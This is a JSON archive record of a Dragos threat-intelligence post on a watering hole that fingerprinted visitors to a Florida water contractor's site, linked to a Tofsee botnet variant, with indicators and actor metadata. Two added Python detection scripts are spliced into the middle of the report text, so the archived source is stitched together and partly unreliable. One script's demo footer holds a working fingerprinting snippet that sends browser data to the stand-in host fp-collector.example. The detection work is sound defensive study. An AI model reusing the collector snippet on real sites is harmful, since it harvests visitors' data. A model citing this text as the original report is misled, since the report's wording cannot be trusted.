{
	"id": "dcda1958-9761-485f-8d9b-471e27756968",
	"created_at": "2026-04-06T00:18:57.279514Z",
	"updated_at": "2026-04-10T03:36:24.726615Z",
	"deleted_at": null,
	"sha1_hash": "12ed6b0f9f53ad3cd0edbb8ccfa3d3e68a6dca5e",
	"title": "When Intrusions Don't Align: A New Water Watering Hole and Oldsmar",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 4126372,
	"plain_text": "When Intrusions Don't Align: A New Water Watering Hole and\r\nOldsmar\r\nBy Dragos, Inc.\r\nPublished: 2021-05-18 · Archived: 2026-04-05 18:22:16 UTC\r\nMembers of the cybersecurity community at large know that learning opportunities present themselves every day.\r\nThe purpose behind this investigative anecdote on the “water watering hole” is educational and highlights how\r\nsometimes two intrusions just don’t line up together no matter how much coincidence there is. We hope you will\r\nagree after reading this that intelligence and intrusion analysis are not always what they seem.\r\nOur story begins in Oldsmar, Florida, on Monday, 08 February 2021, when the Pinellas County Sheriff held a\r\npress conference. The sheriff, Oldsmar mayor, and city manager described a water poisoning attempt at the city’s\r\nwater treatment plant the previous Friday. This unprecedented event made both a stir in the media and among\r\nDragos’s team of adversary hunters.\r\nA Water Watering Hole Is Discovered\r\nDuring our investigation into the infamous water poisoning attempt against the citizens of Oldsmar, Dragos\r\ndiscovered a Florida water utility contractor hosting malicious code on their website (i.e., a watering hole). This\r\nmalicious code seemingly targeted water utilities, particularly in Florida, and more importantly, was visited by a\r\nbrowser from the city of Oldsmar on the same day of the poisoning event.\r\nFigure 1: Website compromised with a unique browser enumeration and fingerprinting script\r\nThe adversary inserted the malicious code into the footer file (Figure 2) of the WordPress-based site associated\r\nwith a Florida water infrastructure construction company. 
The adversary possibly exploited one of the multiple\r\nvulnerable WordPress plugins that Dragos determined were in use on the site at the time of compromise.\r\nhttps://www.dragos.com/blog/industry-news/a-new-water-watering-hole/\r\nPage 1 of 6\n\nFigure 2: Location of the subverted code in the footer of the once compromised WordPress site\r\nxxxxxxxxxxxxxx[.]com\r\nA Snapshot of the Malicious Data Gathering Campaign\r\nThis malicious data gathering campaign affected computer systems that browsed the compromised, but otherwise\r\nlegitimate, website during a 58-day window beginning 20 December 2020. Dragos assisted with malicious code\r\nidentification and initial remediation of the compromised website on 16 February 2021. Those who interacted with\r\nthe malicious code included computers from municipal water utility customers, state and local government\r\nagencies, various water industry-related private companies, and normal internet bot and website crawler traffic.\r\nOver 1000 end-user computers were profiled by the malicious code during that time, mostly from within the\r\nUnited States and the State of Florida, as shown in Figure 3.\r\nFigure 3: Geolocation of US fingerprinted client computers\r\nUsing telemetry from Team Cymru Pure Signal Recon, Dragos determined that a user on a computer system on a\r\nnetwork belonging to the City of Oldsmar browsed the compromised site at exactly 14:49 Coordinated Universal\r\nTime (UTC), or 9:49 am on 05 February 2021. 
This is the same network where an unknown actor reportedly\r\ncompromised a water treatment control plant computer on the morning of 05 February and attempted to poison the\r\nwater supply using the computer system’s Human Machine Interface (HMI).\r\nBased on these initial facts, Dragos released an Advisory Alert on 17 February 2021 to customers informing them\r\nof the watering hole potentially targeting water utilities along with defensive guidance and indicators. The purpose\r\nof an Advisory Alert is to ensure customers receive and can act on timely intelligence when the entire story is not\r\nyet known. We also shared our insights with our partners at the Department of Homeland Security (DHS) so they\r\ncould perform victim notifications if they deemed it important.\r\nAfter the Advisory Alert, Dragos went to work uncovering and exposing the entire threat.\r\nDeciphering the Malicious Fingerprinting Script\r\nDragos reverse-engineered the fingerprinting script and determined it used code from four different code projects:\r\ncore-js, UAParser, regeneratorRuntime, and a data collection script only observed elsewhere on two websites\r\n(script example) associated with a domain registration, hosting, and web development company.\r\nThe fingerprinting script gathered over 100 elements of detailed information about the visitors including the\r\nfollowing:\r\nOperating system and CPU\r\nBrowser, including available languages\r\nTouch points, input methods, presence of camera, accelerometer, microphone\r\nVideo card display adapter details, and\r\nTime zone, geolocation, video codecs, screen dimensions, browser plugins\r\nThe script also directed the visiting browser to two separate browser cipher fingerprinting sites to collect cipher\r\nfingerprint hashes: TLS fingerprint, JA3 SSL Fingerprint. 
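As an added example that is not part of the Dragos post, the following Python script performs the static triage a responder would run on a page suspected of hosting a watering hole like the footer injection described earlier and the fingerprinting script whose collected elements are listed just above: it lists external script hosts that are not on an allowlist, flags inline scripts that touch several of the browser APIs behind those elements (CPU, touch input, media devices, video adapter, time zone), and extracts the hosts such scripts send data to. The footer HTML, the first-party host www.example-water.test and the collector host fp-collector.example are constructed for the demo and are not indicators from the report.

```python
# Added example (not from the Dragos post): static triage of a WordPress page
# for the kind of injected footer script the post describes. The HTML below is
# constructed for the demo; the hosts www.example-water.test (the site itself)
# and fp-collector.example (the collector) are assumptions, not indicators.
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Browser APIs a fingerprinting script touches to collect the kinds of data
# listed above (CPU, touch input, media devices, video adapter, time zone...).
FINGERPRINT_APIS = (
    'navigator.hardwareConcurrency', 'navigator.maxTouchPoints',
    'navigator.plugins', 'navigator.languages', 'WEBGL_debug_renderer_info',
    'enumerateDevices', 'resolvedOptions().timeZone', 'screen.width',
    'canPlayType', 'DeviceMotionEvent',
)
MIN_API_HITS = 3   # one or two of these are normal on a busy site


class ScriptCollector(HTMLParser):
    '''Collects external <script src=...> URLs and inline <script> bodies.'''

    def __init__(self):
        super().__init__()
        self.external = []
        self.inline = []
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag != 'script':
            return
        src = dict(attrs).get('src')
        if src:
            self.external.append(src)
        else:
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == 'script' and self._in_script:
            self.inline.append(''.join(self._buf))
            self._in_script = False


def urls_in(script_text):
    '''Pull http(s) URLs out of script text (no regex needed for triage).'''
    quotes = chr(39) + chr(34) + ';'   # both quote characters plus a semicolon
    found = []
    for token in script_text.replace('(', ' ').replace(')', ' ').replace(',', ' ').split():
        token = token.strip(quotes)
        if token.startswith('http://') or token.startswith('https://'):
            found.append(token)
    return found


def triage(html, allowed_hosts):
    '''Return (kind, detail) findings: third-party script hosts, inline scripts
    that call several fingerprinting APIs, and hosts such scripts send data to.'''
    parser = ScriptCollector()
    parser.feed(html)
    parser.close()
    findings = []
    for src in parser.external:
        host = urlsplit(src).hostname or ''      # '' for relative, first-party paths
        if host and host not in allowed_hosts:
            findings.append(('external-script', host))
    for body in parser.inline:
        hits = tuple(api for api in FINGERPRINT_APIS if api in body)
        if len(hits) >= MIN_API_HITS:
            findings.append(('fingerprinting-apis', hits))
        for url in urls_in(body):
            host = urlsplit(url).hostname or ''
            if host and host not in allowed_hosts:
                findings.append(('exfil-endpoint', host))
    return findings


ALLOWED_HOSTS = {'www.example-water.test'}

# Constructed footer: one legitimate include, one injected include and an
# injected inline collector that posts its results to a third-party host.
INJECTED_FOOTER = '''
<footer class='site-footer'>
  <p>Copyright Example Water Construction Co.</p>
  <script src='https://www.example-water.test/wp-includes/js/jquery.js'></script>
  <script src='https://fp-collector.example/static/bundle.js'></script>
  <script>
  (function(){
    var d = {};
    d.cpu = navigator.hardwareConcurrency;
    d.touch = navigator.maxTouchPoints;
    d.tz = Intl.DateTimeFormat().resolvedOptions().timeZone;
    d.gl = document.createElement('canvas').getContext('webgl')
             .getExtension('WEBGL_debug_renderer_info');
    navigator.mediaDevices.enumerateDevices().then(function(x){ d.media = x.length; });
    fetch('https://fp-collector.example/collect', {method: 'POST', body: JSON.stringify(d)});
  })();
  </script>
</footer>
'''

if __name__ == '__main__':
    for finding in triage(INJECTED_FOOTER, ALLOWED_HOSTS):
        print(finding)
```

Run against a saved copy of the live page rather than the theme files on disk: the post notes the code was inserted into the footer file, but a plugin or a database-stored widget can inject scripts too, and only the rendered HTML shows what visitors actually receive. An allowlist of the site's own hosts and its known CDNs keeps the first finding type quiet; the API-count threshold is what separates a fingerprinting collector from ordinary analytics.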
Network defenders commonly compute TLS client fingerprints\r\nsuch as JA3 (as ja3er[.]com does, for example) to detect connections from\r\nmalware-infected hosts and to distinguish hostile connections from legitimate browser client traffic. Once all this data\r\nwas collected in the browser memory, the JavaScript code sent the data via Hypertext Transfer Protocol (HTTP)\r\nPOSTs to a database on the same Heroku app site that hosted the script, bdatac.herokuapp[.]com. This Heroku app\r\nwas taken down after notification from Dragos.\r\nDragos found exactly one other internet site that hosted this complex code and served it to visiting internet\r\nbrowsers, DarkTeam Store. DarkTeam Store claims to be a dark market that supplies thousands of customers with\r\ngift cards and accounts (Figure 4).\r\nFigure 4: Browser enumeration and fingerprinting script on purported dark market site\r\ndarkteam.store\r\nAdditional analysis of data obtained by Dragos revealed that at least a portion of this site may not actually be a\r\ndark market, but rather a check-in place for systems infected with a recent variant of botnet malware known as\r\nTofsee. Dragos found evidence showing that the DarkTeam store and the water infrastructure construction\r\ncompany website were subverted by the same actor on the same day (20 December 2020). 
Dragos observed\r\n12,735 IP addresses representing likely Tofsee-infected systems worldwide employing 271 unique user agents.\r\nThese clients connected to a non-public (i.e., requiring authentication) page (httpx://darkteam[.]store/dogs/Home-2.html) of the DarkTeam site and presented a browser user agent string with a peculiar “Tesseract/1.0” artifact\r\n(Figure 5).\r\nFigure 5: Unique “Tesseract/1.0” user agent substring artifact associated with browser check-ins to\r\nrestricted page on darkteam.store site\r\nImproving Botnets to Impersonate Legitimate Browser Activity\r\nThis bot check-in routine for JA3 cipher fingerprinting may be the Tofsee malware author’s response to network\r\ndefense techniques used to detect previous iterations of Tofsee botnet malware with a characteristic JA3 hash.\r\nDragos performed forensic log analysis and identified three JA3 hashes unique to this new Tofsee botnet that\r\nDragos calls “Tesseract.” Dragos also obtained other JA3 hashes from an industry partner that observed\r\nconnections from this botnet. Some of these JA3 hashes are also associated with legitimate browsers. Dragos\r\nfocuses solely on ICS cybersecurity, but as we obtain detailed intelligence on this threat from our investigation,\r\nwe share indicators to facilitate botnet detection.\r\nWith the forensic information we collected so far, Dragos’s best assessment is that an actor deployed the watering\r\nhole on the water infrastructure construction company site to collect legitimate browser data for the purpose of\r\nimproving the botnet malware’s ability to impersonate legitimate web browser activity. 
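The following Python is an added example, not code from the Dragos post or from Dragos. It shows how a JA3 hash is derived from ClientHello fields the way the published JA3 algorithm does it (GREASE values dropped, decimal values, MD5 of the comma-separated string), which is why a bot that varies its handshake produces several hashes, and it then runs the indicators listed at the end of the post over constructed Zeek-style ssl.log rows and proxy log records. Because the post notes that some of the Tesseract JA3 hashes are also produced by legitimate browsers, a JA3 match alone is only queued for review; the Tesseract/1.0 user agent artifact or a check-in to the darkteam[.]store page corroborates it. The IP addresses, the log rows, the proxy records and the placeholder hash 0123456789abcdef0123456789abcdef are constructed for the demo.

```python
# Added example (not from the Dragos post): JA3 derivation from ClientHello
# fields, plus a detection pass using the indicators published in the post.
# Log rows, IP addresses and the placeholder hash are constructed for the demo.
import hashlib

# GREASE values (0x0a0a, 0x1a1a, ... 0xfafa) are randomised per connection and
# are excluded from the JA3 string so the hash stays stable across connections.
GREASE = {0x0a0a + 0x1010 * i for i in range(16)}


def ja3_string(version, ciphers, extensions, curves, point_formats):
    '''JA3 string: five fields joined by commas, values joined by dashes,
    everything in decimal, GREASE dropped (the published JA3 algorithm).'''
    def clean(values):
        return '-'.join(str(v) for v in values if v not in GREASE)
    return ','.join([str(version), clean(ciphers), clean(extensions),
                     clean(curves), clean(point_formats)])


def ja3_hash(version, ciphers, extensions, curves, point_formats):
    '''The JA3 hash is the MD5 of the JA3 string, as tools such as Zeek compute it.'''
    s = ja3_string(version, ciphers, extensions, curves, point_formats)
    return hashlib.md5(s.encode('ascii')).hexdigest()


# Indicators from the post: the three Tesseract JA3 hashes, the user agent
# artifact and the restricted check-in page on the DarkTeam site.
TESSERACT_JA3 = {
    '5732cd1c2c85c7548ef840e05f42feec',
    '45728c30345dddda40cd01ee2f7a4c8e',
    '9f681ac5cde4d035b5d3dc040bda1a34',
}
UA_ARTIFACT = 'Tesseract/1.0'
CHECKIN_HOST, CHECKIN_PATH = 'darkteam.store', '/dogs/Home-2.html'

# Constructed Zeek-style ssl.log rows (space separated here; the Zeek ja3
# package adds the ja3 column): ts id.orig_h id.resp_h server_name ja3
SSL_LOG = '''
1613670000.1 10.20.30.40 203.0.113.7 darkteam.store 5732cd1c2c85c7548ef840e05f42feec
1613670001.2 10.20.30.41 198.51.100.9 www.example.com 0123456789abcdef0123456789abcdef
1613670002.3 10.20.30.42 198.51.100.9 www.example.com 9f681ac5cde4d035b5d3dc040bda1a34
'''

# Constructed proxy log records, already parsed into (client, host, path, user agent).
WEB_HITS = [
    ('10.20.30.40', 'darkteam.store', '/dogs/Home-2.html',
     'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:84.0; Tesseract/1.0) Gecko/20100101 Firefox/84.0'),
    ('10.20.30.42', 'www.example.com', '/',
     'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.104 Safari/537.36'),
]


def parse_ssl_log(text):
    rows = []
    for line in text.strip().splitlines():
        ts, orig, resp, sni, ja3 = line.split()
        rows.append({'ts': float(ts), 'src': orig, 'dst': resp, 'sni': sni, 'ja3': ja3})
    return rows


def detect(ssl_rows, web_hits):
    '''Score evidence per client IP. A JA3 match alone is weak, because the post
    says some Tesseract hashes are shared with legitimate browsers; the UA
    artifact and the darkteam[.]store check-in page are the corroborators.'''
    score, reasons = {}, {}

    def add(ip, points, why):
        score[ip] = score.get(ip, 0) + points
        reasons.setdefault(ip, []).append(why)

    for r in ssl_rows:
        if r['ja3'] in TESSERACT_JA3:
            add(r['src'], 1, 'ja3:' + r['ja3'])
    for ip, host, path, ua in web_hits:
        if UA_ARTIFACT in ua:
            add(ip, 2, 'ua:' + UA_ARTIFACT)
        if host == CHECKIN_HOST and path == CHECKIN_PATH:
            add(ip, 1, 'checkin:' + host + path)
    return {ip: (score[ip], reasons[ip]) for ip in score}


def verdict(results, threshold=3):
    '''(corroborated IPs, JA3-only IPs queued for analyst review).'''
    confirmed = sorted(ip for ip, (s, _) in results.items() if s >= threshold)
    review = sorted(ip for ip, (s, _) in results.items() if s < threshold)
    return confirmed, review


if __name__ == '__main__':
    print(verdict(detect(parse_ssl_log(SSL_LOG), WEB_HITS)))
```

The scoring weights are a design choice for the demo: the user agent substring is the strongest single signal because no legitimate browser emits it, while a JA3 hit can be a Firefox or Chrome user and is therefore worth a look, not an alert. When the botnet rotates through more handshakes than the three published hashes cover, the check-in path and the artifact still fire, which is the point of layering the indicators.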
The botnet’s use of at least\r\nten different cipher handshakes or JA3 hashes, some of which mimic legitimate browsers, compared to the widely\r\npublished hash of a single handshake of a previous Tofsee bot iteration is evidence of botnet improvement.\r\nIn Summary\r\nWe do not understand why the adversary chose this specific Florida water construction company site to\r\ncompromise and to host their code. Interestingly, and unlike other watering hole attacks, the code did not deliver\r\nexploits or attempt to achieve access to victim computers. It is possible the actor believed that the water\r\ninfrastructure construction website would allow more dwell time to collect data important for the actor’s\r\nobjectives than a busier but more closely monitored website with a dedicated security team.\r\nSeveral elements early in our investigation suggested a highly potent and dangerous threat to water utilities:\r\nFlorida-focused watering hole\r\nTemporal correlation to Oldsmar event\r\nHighly encoded and sophisticated JavaScript\r\nFew code locations on the internet\r\nKnown ICS-targeting activity groups, including DYMALLOY, ALLANITE, and RASPITE, use watering holes for\r\ninitial access\r\nFurther investigation revealed a less ominous threat but provided an excellent lesson in alerting the industry early\r\nto potential threats while continuing the investigation until the full scope and intent of the events can be\r\nunderstood.\r\nThis is not a typical watering hole. 
We have medium confidence it did not directly compromise any organization.\r\nBut it does represent an exposure risk to the water industry and highlights the importance of controlling access to\r\nuntrusted websites, especially for Operational Technology (OT) and Industrial Control System (ICS)\r\nenvironments.\r\nIndicators\r\n“Tesseract” variant of the Tofsee botnet malware indicators:\r\nJA3 Hashes\r\n5732cd1c2c85c7548ef840e05f42feec\r\n45728c30345dddda40cd01ee2f7a4c8e\r\n9f681ac5cde4d035b5d3dc040bda1a34\r\nUser-agent substring artifact\r\nTesseract/1.0\r\nUser agent examples\r\nMozilla/5.0 (Windows NT 10.0; Win64; x64; Tesseract/1.0) AppleWebKit/537.36 (KHTML, like Gecko)\r\nChrome/80.0.3987.163 Safari/537.36\r\nMozilla/5.0 (Android 10; Mobile; rv:84.0; Tesseract/1.0) Gecko/84.0 Firefox/84.0\r\nMozilla/5.0 (iPhone; CPU iPhone OS 14_3 like Mac OS X; Tesseract/1.0) AppleWebKit/605.1.15 (KHTML,\r\nlike Gecko) Version/14.0.2 Mobile/15E148 Safari/604.\r\nMozilla/5.0 (Windows NT 6.1; Tesseract/1.0) AppleWebKit/537.36 (KHTML, like Gecko)\r\nChrome/88.0.4324.104 Safari/537.36\r\nMozilla/5.0 (Windows NT 6.1; Win64; x64; rv:84.0; Tesseract/1.0) Gecko/20100101 Firefox/84.0 (count: 68,\r\nlast seen: 2021-02-18 17:32:12)\r\nMozilla/5.0 (Linux; Android 10; Redmi Note 9S; Tesseract/1.0) AppleWebKit/537.36 (KHTML, like Gecko)\r\nChrome/88.0.4324.152 Mobile Safari/537\r\nMozilla/5.0 (Windows NT 10.0; Win64; x64; Tesseract/1.0) AppleWebKit/537.36 (KHTML, like Gecko)\r\nChrome/75.0.3770.142 Safari/537.36\r\nMozilla/5.0 (Linux; Android 10; Redmi Note 8; Tesseract/1.0) AppleWebKit/537.36 (KHTML, like Gecko)\r\nChrome/87.0.4280.101 Mobile Safari/537.36\r\nTofsee botnet malware SHA256\r\n6ce6c04ffb7f0ac158c0e340b52d2ebdb48fd089bd24c6fdbf81947bce0e476d\r\n2701f35430167bbb99f334c81088af75f8209a07cb1bcbf9c765a4968af2fbaa\r\nSource: 
https://www.dragos.com/blog/industry-news/a-new-water-watering-hole/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://www.dragos.com/blog/industry-news/a-new-water-watering-hole/"
	],
	"report_names": [
		"a-new-water-watering-hole"
	],
	"threat_actors": [
		{
			"id": "81d49904-579d-45b3-ace2-1fdf0a713bc4",
			"created_at": "2022-10-25T15:50:23.331457Z",
			"updated_at": "2026-04-10T02:00:05.291098Z",
			"deleted_at": null,
			"main_name": "Leafminer",
			"aliases": [
				"Leafminer",
				"Raspite"
			],
			"source_name": "MITRE:Leafminer",
			"tools": [
				"LaZagne",
				"Mimikatz",
				"MailSniper",
				"PsExec"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "552eeef7-4a19-44de-9147-db8893c115ef",
			"created_at": "2023-01-06T13:46:38.598788Z",
			"updated_at": "2026-04-10T02:00:03.034846Z",
			"deleted_at": null,
			"main_name": "RASPITE",
			"aliases": [
				"LeafMiner",
				"Raspite"
			],
			"source_name": "MISPGALAXY:RASPITE",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "649b5b3e-b16e-44db-91bc-ae80b825050e",
			"created_at": "2022-10-25T15:50:23.290412Z",
			"updated_at": "2026-04-10T02:00:05.257022Z",
			"deleted_at": null,
			"main_name": "Dragonfly",
			"aliases": [
				"TEMP.Isotope",
				"DYMALLOY",
				"Berserk Bear",
				"TG-4192",
				"Crouching Yeti",
				"IRON LIBERTY",
				"Energetic Bear",
				"Ghost Blizzard"
			],
			"source_name": "MITRE:Dragonfly",
			"tools": [
				"MCMD",
				"Impacket",
				"CrackMapExec",
				"Backdoor.Oldrea",
				"Mimikatz",
				"PsExec",
				"Trojan.Karagany",
				"netsh"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "a792743d-78a4-40c9-9d9a-a12c52880297",
			"created_at": "2023-01-06T13:46:38.75457Z",
			"updated_at": "2026-04-10T02:00:03.089271Z",
			"deleted_at": null,
			"main_name": "ALLANITE",
			"aliases": [
				"Palmetto Fusion",
				"Allanite"
			],
			"source_name": "MISPGALAXY:ALLANITE",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "90307967-d5eb-4b7b-b8de-6fa2089a176e",
			"created_at": "2022-10-25T15:50:23.501119Z",
			"updated_at": "2026-04-10T02:00:05.347826Z",
			"deleted_at": null,
			"main_name": "Dragonfly 2.0",
			"aliases": [
				"Dragonfly 2.0",
				"IRON LIBERTY",
				"DYMALLOY",
				"Berserk Bear"
			],
			"source_name": "MITRE:Dragonfly 2.0",
			"tools": [
				"netsh",
				"Impacket",
				"MCMD",
				"CrackMapExec",
				"Trojan.Karagany",
				"PsExec"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "1a76ed30-4daf-4817-98ae-87c667364464",
			"created_at": "2022-10-25T16:47:55.891029Z",
			"updated_at": "2026-04-10T02:00:03.646466Z",
			"deleted_at": null,
			"main_name": "IRON LIBERTY",
			"aliases": [
				"ALLANITE ",
				"ATK6 ",
				"BROMINE ",
				"CASTLE ",
				"Crouching Yeti ",
				"DYMALLOY ",
				"Dragonfly ",
				"Energetic Bear / Berserk Bear ",
				"Ghost Blizzard ",
				"TEMP.Isotope ",
				"TG-4192 "
			],
			"source_name": "Secureworks:IRON LIBERTY",
			"tools": [
				"ClientX",
				"Ddex Loader",
				"Havex",
				"Karagany",
				"Loek",
				"MCMD",
				"Sysmain",
				"xfrost"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "0a0132a3-526d-4698-be49-5e75530c1417",
			"created_at": "2022-10-25T15:50:23.856139Z",
			"updated_at": "2026-04-10T02:00:05.42054Z",
			"deleted_at": null,
			"main_name": "ALLANITE",
			"aliases": [
				"ALLANITE",
				"Palmetto Fusion"
			],
			"source_name": "MITRE:ALLANITE",
			"tools": null,
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "1c4281e9-0a4c-4f20-94a2-25ed3661cc98",
			"created_at": "2022-10-25T16:07:23.301826Z",
			"updated_at": "2026-04-10T02:00:04.529332Z",
			"deleted_at": null,
			"main_name": "Allanite",
			"aliases": [
				"G1000",
				"Palmetto Fusion"
			],
			"source_name": "ETDA:Allanite",
			"tools": [
				"PsExec",
				"SecreetsDump",
				"THC Hydra"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "5cbf6c32-482d-4cd2-9d11-0d9311acdc28",
			"created_at": "2023-01-06T13:46:38.39927Z",
			"updated_at": "2026-04-10T02:00:02.958273Z",
			"deleted_at": null,
			"main_name": "ENERGETIC BEAR",
			"aliases": [
				"BERSERK BEAR",
				"ALLANITE",
				"Group 24",
				"Koala Team",
				"G0035",
				"ATK6",
				"ITG15",
				"DYMALLOY",
				"TG-4192",
				"Crouching Yeti",
				"Havex",
				"IRON LIBERTY",
				"Blue Kraken",
				"Ghost Blizzard"
			],
			"source_name": "MISPGALAXY:ENERGETIC BEAR",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "32c8c1a1-ae5c-4a05-a95d-2e970a46cd1e",
			"created_at": "2022-10-25T16:07:23.777999Z",
			"updated_at": "2026-04-10T02:00:04.747552Z",
			"deleted_at": null,
			"main_name": "Leafminer",
			"aliases": [
				"Flash Kitten",
				"G0077",
				"Leafminer",
				"Raspite"
			],
			"source_name": "ETDA:Leafminer",
			"tools": [
				"Imecab",
				"LaZagne",
				"Mimikatz",
				"PhpSpy",
				"Sorgu"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "e2a4bc0b-6745-4e55-9d7c-3d169d70b025",
			"created_at": "2022-10-25T16:07:23.386907Z",
			"updated_at": "2026-04-10T02:00:04.576815Z",
			"deleted_at": null,
			"main_name": "Berserk Bear",
			"aliases": [
				"Berserk Bear",
				"Dragonfly 2.0",
				"Dymalloy",
				"G0074"
			],
			"source_name": "ETDA:Berserk Bear",
			"tools": [
				"Fuerboos",
				"Goodor",
				"Impacket",
				"Karagany",
				"Karagny",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"Phishery",
				"Trojan.Karagany",
				"Trojan.Phisherly",
				"xFrost"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434737,
	"ts_updated_at": 1775792184,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/12ed6b0f9f53ad3cd0edbb8ccfa3d3e68a6dca5e.pdf",
		"text": "https://archive.orkl.eu/12ed6b0f9f53ad3cd0edbb8ccfa3d3e68a6dca5e.txt",
		"img": "https://archive.orkl.eu/12ed6b0f9f53ad3cd0edbb8ccfa3d3e68a6dca5e.jpg"
	}
}